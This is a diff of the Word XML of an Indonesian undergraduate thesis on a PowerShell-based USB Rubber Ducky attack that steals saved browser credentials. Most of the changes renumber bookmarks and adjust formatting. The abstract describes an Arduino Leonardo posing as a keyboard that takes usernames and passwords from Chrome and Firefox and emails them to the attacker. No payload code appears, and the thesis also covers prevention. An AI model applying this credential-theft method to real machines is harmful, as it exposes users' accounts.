           <w:lang w:val="id-ID"/>
         </w:rPr>
         <w:t>Kekurangan Sistem</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="152"/>
+      <w:bookmarkEnd w:id="151"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -42841,14 +42839,14 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="153" w:name="_Toc43262091"/>
+      <w:bookmarkStart w:id="152" w:name="_Toc43264859"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
         <w:t>Interupsi</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="153"/>
+      <w:bookmarkEnd w:id="152"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -42961,7 +42959,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="154" w:name="_Toc43262092"/>
+      <w:bookmarkStart w:id="153" w:name="_Toc43264860"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -42970,7 +42968,7 @@
         </w:rPr>
         <w:t>Delay</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="154"/>
+      <w:bookmarkEnd w:id="153"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -43109,14 +43107,14 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="155" w:name="_Toc43262093"/>
+      <w:bookmarkStart w:id="154" w:name="_Toc43264861"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
         <w:t>Koneksi Internet</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="155"/>
+      <w:bookmarkEnd w:id="154"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -43190,14 +43188,14 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="156" w:name="_Toc43262094"/>
+      <w:bookmarkStart w:id="155" w:name="_Toc43264862"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
         <w:t>Analisis</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="156"/>
+      <w:bookmarkEnd w:id="155"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -43286,14 +43284,14 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="157" w:name="_Toc43262095"/>
+      <w:bookmarkStart w:id="156" w:name="_Toc43264863"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
         <w:t>Analisis Rubber Ducky</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="157"/>
+      <w:bookmarkEnd w:id="156"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -43572,7 +43570,7 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="158" w:name="_Toc43259322"/>
+      <w:bookmarkStart w:id="157" w:name="_Toc43259322"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -43624,7 +43622,7 @@
         </w:rPr>
         <w:t>. Perbandingan Waktu Penyerangan</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="158"/>
+      <w:bookmarkEnd w:id="157"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -44752,7 +44750,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="159" w:name="_Toc43262096"/>
+      <w:bookmarkStart w:id="158" w:name="_Toc43264864"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -44765,7 +44763,7 @@
         </w:rPr>
         <w:t>Interupsi</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="159"/>
+      <w:bookmarkEnd w:id="158"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -44897,7 +44895,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="160" w:name="_Toc43258911"/>
+      <w:bookmarkStart w:id="159" w:name="_Toc43258911"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -44967,7 +44965,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> saat Program Berjalan</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="160"/>
+      <w:bookmarkEnd w:id="159"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -45020,14 +45018,14 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="161" w:name="_Toc43262097"/>
+      <w:bookmarkStart w:id="160" w:name="_Toc43264865"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
         <w:t>Analisis Pengambilan Data</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="161"/>
+      <w:bookmarkEnd w:id="160"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -45268,7 +45266,7 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="162" w:name="_Toc43259323"/>
+      <w:bookmarkStart w:id="161" w:name="_Toc43259323"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -45320,7 +45318,7 @@
         </w:rPr>
         <w:t>. Skenario Pengujian Pengambilan Data</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="162"/>
+      <w:bookmarkEnd w:id="161"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -46173,14 +46171,14 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="163" w:name="_Toc43262098"/>
+      <w:bookmarkStart w:id="162" w:name="_Toc43264866"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
         <w:t>Rekomendasi Untuk Mencegah Penyerangan</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="163"/>
+      <w:bookmarkEnd w:id="162"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -46301,7 +46299,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="164" w:name="_Hlk43257822"/>
+      <w:bookmarkStart w:id="163" w:name="_Hlk43257822"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -46370,7 +46368,7 @@
         </w:rPr>
         <w:t>browser</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="164"/>
+      <w:bookmarkEnd w:id="163"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -46406,7 +46404,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="165" w:name="_Hlk43257850"/>
+      <w:bookmarkStart w:id="164" w:name="_Hlk43257850"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -46448,7 +46446,7 @@
         </w:rPr>
         <w:t>Memblokir Unduhan Powershell</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="165"/>
+      <w:bookmarkEnd w:id="164"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -46463,7 +46461,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="166" w:name="_Toc43262099"/>
+      <w:bookmarkStart w:id="165" w:name="_Toc43264867"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -46471,23 +46469,23 @@
         <w:lastRenderedPageBreak/>
         <w:t>Kesimpulan dan Saran</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="165"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="166" w:name="_Toc43264868"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Kesimpulan</w:t>
+      </w:r>
       <w:bookmarkEnd w:id="166"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="167" w:name="_Toc43262100"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>Kesimpulan</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="167"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -46979,7 +46977,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="168" w:name="_Toc43262101"/>
+      <w:bookmarkStart w:id="167" w:name="_Toc43264869"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -46987,7 +46985,7 @@
         <w:lastRenderedPageBreak/>
         <w:t>Saran</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="168"/>
+      <w:bookmarkEnd w:id="167"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -47127,6 +47125,8 @@
         </w:rPr>
         <w:t>penyerangan yang disediakan Nirsoft.com, selalu usahakan untuk menggunakan versi terbaru untuk setiap program yang digunakan.</w:t>
       </w:r>
+      <w:bookmarkStart w:id="168" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="168"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -47170,7 +47170,7 @@
         </w:numPr>
         <w:ind w:left="431" w:hanging="143"/>
       </w:pPr>
-      <w:bookmarkStart w:id="169" w:name="_Toc43262102"/>
+      <w:bookmarkStart w:id="169" w:name="_Toc43264870"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>DAFTAR</w:t>
@@ -47178,8 +47178,8 @@
       <w:r>
         <w:t xml:space="preserve"> PUSTAKA</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="49"/>
       <w:bookmarkEnd w:id="50"/>
-      <w:bookmarkEnd w:id="51"/>
       <w:bookmarkEnd w:id="169"/>
     </w:p>
     <w:p>
@@ -52242,7 +52242,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{7FA6BB16-3237-4DB3-BDAA-882D0CD8BC7A}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{FC490B28-088F-4ED4-9E6B-B8D948CF742E}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/TA2_Abdul Azies Muslim_IMPLEMENTASI DAN ANALISIS KELEMAHAN PADA BROWSER DENGAN MENGGUNAKAN SERANGAN USB RUBBER DUCKY BERBASIS POWERSHELL.docx
+++ b/TA2_Abdul Azies Muslim_IMPLEMENTASI DAN ANALISIS KELEMAHAN PADA BROWSER DENGAN MENGGUNAKAN SERANGAN USB RUBBER DUCKY BERBASIS POWERSHELL.docx
@@ -521,8 +521,8 @@
       </w:pPr>
       <w:bookmarkStart w:id="0" w:name="_Toc405949670"/>
       <w:bookmarkStart w:id="1" w:name="_Toc463344411"/>
-      <w:bookmarkStart w:id="2" w:name="_Toc75146097"/>
-      <w:bookmarkStart w:id="3" w:name="_Toc43264804"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc43264804"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc75146097"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -532,7 +532,7 @@
       </w:r>
       <w:bookmarkEnd w:id="0"/>
       <w:bookmarkEnd w:id="1"/>
-      <w:bookmarkEnd w:id="3"/>
+      <w:bookmarkEnd w:id="2"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1241,15 +1241,7 @@
                               <w:jc w:val="center"/>
                             </w:pPr>
                             <w:r>
-                              <w:t xml:space="preserve">Ahmad Almaarif, </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:t>S.Kom</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:t>., M.T.</w:t>
+                              <w:t>Ahmad Almaarif, S.Kom., M.T.</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -1331,15 +1323,7 @@
                         <w:jc w:val="center"/>
                       </w:pPr>
                       <w:r>
-                        <w:t xml:space="preserve">Ahmad Almaarif, </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:t>S.Kom</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:t>., M.T.</w:t>
+                        <w:t>Ahmad Almaarif, S.Kom., M.T.</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -1487,7 +1471,7 @@
                                 <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="147DA163" wp14:editId="32A50026">
                                   <wp:extent cx="850900" cy="1113155"/>
                                   <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                                  <wp:docPr id="3" name="Picture 3" descr="D:\SI-40-08\KTM\Abdul Azies Muslim.jpg"/>
+                                  <wp:docPr id="24" name="Picture 24" descr="D:\SI-40-08\KTM\Abdul Azies Muslim.jpg"/>
                                   <wp:cNvGraphicFramePr>
                                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                                   </wp:cNvGraphicFramePr>
@@ -1578,7 +1562,7 @@
                           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="147DA163" wp14:editId="32A50026">
                             <wp:extent cx="850900" cy="1113155"/>
                             <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                            <wp:docPr id="3" name="Picture 3" descr="D:\SI-40-08\KTM\Abdul Azies Muslim.jpg"/>
+                            <wp:docPr id="24" name="Picture 24" descr="D:\SI-40-08\KTM\Abdul Azies Muslim.jpg"/>
                             <wp:cNvGraphicFramePr>
                               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                             </wp:cNvGraphicFramePr>
@@ -2525,12 +2509,14 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="8" w:name="_Hlk43328558"/>
+      <w:bookmarkStart w:id="9" w:name="_Hlk43328671"/>
       <w:r>
         <w:t xml:space="preserve">Seiring dengan perkembangan sistem operasi Windows, aplikasi </w:t>
       </w:r>
@@ -2795,11 +2781,23 @@
       </w:r>
       <w:r>
         <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>pengambila</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>n</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t>dumping password</w:t>
+        <w:t xml:space="preserve"> password</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2831,7 +2829,7 @@
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve"> yang dihubungkan ke perangkat komputer. Hasil yang didapatkan dari penelitian ini adalah </w:t>
+        <w:t xml:space="preserve"> yang dihubungkan ke perangkat komputer. Hasil yang didapatkan dari penelitian ini adalah</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2839,13 +2837,19 @@
           <w:iCs/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve">password </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">pada </w:t>
+        <w:t xml:space="preserve">username </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>dan</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2853,37 +2857,67 @@
           <w:iCs/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t>browser</w:t>
+        <w:t xml:space="preserve">password </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">pada </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Google Chrome</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> dan Mozilla Firefox</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> didapatkan saat </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>USB</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> dihubungkan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>lalu</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> dikirimkan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>ke</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">berbasis </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>Chrom</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>ium</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> didapatkan saat </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2891,29 +2925,19 @@
           <w:iCs/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t>flashdisk</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> dihubungkan </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>lalu</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> dikirimkan melalui email peretas.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+        <w:t>email</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> peretas.</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="9"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -2922,6 +2946,7 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -2931,7 +2956,14 @@
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve">Kata Kunci: USB </w:t>
+        <w:t xml:space="preserve">Kata Kunci: </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="10" w:name="_Hlk43328691"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">USB </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2967,9 +2999,12 @@
         </w:rPr>
         <w:t>.</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+      <w:bookmarkEnd w:id="8"/>
+      <w:bookmarkEnd w:id="10"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
@@ -2989,7 +3024,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc43264807"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc43264807"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -2997,7 +3032,7 @@
         <w:lastRenderedPageBreak/>
         <w:t>ABSTRACT</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="8"/>
+      <w:bookmarkEnd w:id="11"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3121,12 +3156,13 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="12" w:name="_Hlk43328738"/>
       <w:r>
         <w:t xml:space="preserve">Along with the development of the Windows operating system, bowser applications are also developing rapidly. The most widely used browser application in the world today is Google Chrome. This browser has a password storage feature that makes it easy for users to not have to always log on to a particular website that is desired, but in fact storing passwords in the browser is quite dangerous because the stored data is not encrypted and hackers can get it with brute force attacks, besides that the password stored ones are also easy to read through malware. BadUSB is a USB device that is manipulated by an attacker, so that when detected by the target computer this device will be recognized as an ordinary USB interface device, such as a computer keyboard. There is a way to get a password on the browser by using the Rubber Ducky method to </w:t>
       </w:r>
@@ -3154,16 +3190,34 @@
         <w:t>Arduino Leonardo</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> device that is connected to a computer device. The results obtained from this study are passwords in the </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>Chromium-based browser</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> obtained when the flash is connected and sent </w:t>
+        <w:t xml:space="preserve"> device that is connected to a computer device. The results obtained from this study ar</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>e usernames and</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> passwords in the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Google Chrome and Mozilla Firefox</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> obtained when the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>USB</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> is connected and sent </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3172,7 +3226,16 @@
         <w:t>to</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> hacker</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">the </w:t>
+      </w:r>
+      <w:r>
+        <w:t>hacker</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3183,9 +3246,11 @@
       <w:r>
         <w:t>s email.</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+      <w:bookmarkEnd w:id="12"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -3194,6 +3259,7 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:b/>
@@ -3212,7 +3278,14 @@
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve">: USB Attack, Powershell, </w:t>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="13" w:name="_Hlk43328755"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">USB Attack, Powershell, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3226,6 +3299,7 @@
         </w:rPr>
         <w:t>, Rubber Ducky.</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="13"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -3235,23 +3309,23 @@
         </w:rPr>
         <w:br w:type="page"/>
       </w:r>
-      <w:bookmarkEnd w:id="2"/>
+      <w:bookmarkEnd w:id="3"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="NON-BAB"/>
         <w:ind w:left="0"/>
       </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc75146100"/>
-      <w:bookmarkStart w:id="10" w:name="_Toc463344415"/>
-      <w:bookmarkStart w:id="11" w:name="_Toc43264808"/>
+      <w:bookmarkStart w:id="14" w:name="_Toc75146100"/>
+      <w:bookmarkStart w:id="15" w:name="_Toc463344415"/>
+      <w:bookmarkStart w:id="16" w:name="_Toc43264808"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>KATA PENGANTAR</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="9"/>
-      <w:bookmarkEnd w:id="10"/>
-      <w:bookmarkEnd w:id="11"/>
+      <w:bookmarkEnd w:id="14"/>
+      <w:bookmarkEnd w:id="15"/>
+      <w:bookmarkEnd w:id="16"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3734,16 +3808,16 @@
       <w:r>
         <w:br w:type="page"/>
       </w:r>
-      <w:bookmarkStart w:id="12" w:name="_Toc75146101"/>
-      <w:bookmarkStart w:id="13" w:name="_Toc463344416"/>
-      <w:bookmarkStart w:id="14" w:name="_Toc43264809"/>
+      <w:bookmarkStart w:id="17" w:name="_Toc75146101"/>
+      <w:bookmarkStart w:id="18" w:name="_Toc463344416"/>
+      <w:bookmarkStart w:id="19" w:name="_Toc43264809"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>DAFTAR ISI</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="12"/>
-      <w:bookmarkEnd w:id="13"/>
-      <w:bookmarkEnd w:id="14"/>
+      <w:bookmarkEnd w:id="17"/>
+      <w:bookmarkEnd w:id="18"/>
+      <w:bookmarkEnd w:id="19"/>
     </w:p>
     <w:sdt>
       <w:sdtPr>
@@ -9987,16 +10061,16 @@
       <w:pPr>
         <w:pStyle w:val="NONBAB"/>
       </w:pPr>
-      <w:bookmarkStart w:id="15" w:name="_Toc75146103"/>
-      <w:bookmarkStart w:id="16" w:name="_Toc463344418"/>
-      <w:bookmarkStart w:id="17" w:name="_Toc43264810"/>
+      <w:bookmarkStart w:id="20" w:name="_Toc75146103"/>
+      <w:bookmarkStart w:id="21" w:name="_Toc463344418"/>
+      <w:bookmarkStart w:id="22" w:name="_Toc43264810"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>DAFTAR GAMBAR DAN ILUSTRASI</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="15"/>
-      <w:bookmarkEnd w:id="16"/>
-      <w:bookmarkEnd w:id="17"/>
+      <w:bookmarkEnd w:id="20"/>
+      <w:bookmarkEnd w:id="21"/>
+      <w:bookmarkEnd w:id="22"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -10004,6 +10078,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -10102,6 +10177,7 @@
         <w:tabs>
           <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
         </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -10179,10 +10255,12 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="BodyText"/>
-        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:spacing w:after="0"/>
         <w:ind w:right="44"/>
         <w:rPr>
           <w:noProof/>
+          <w:sz w:val="2"/>
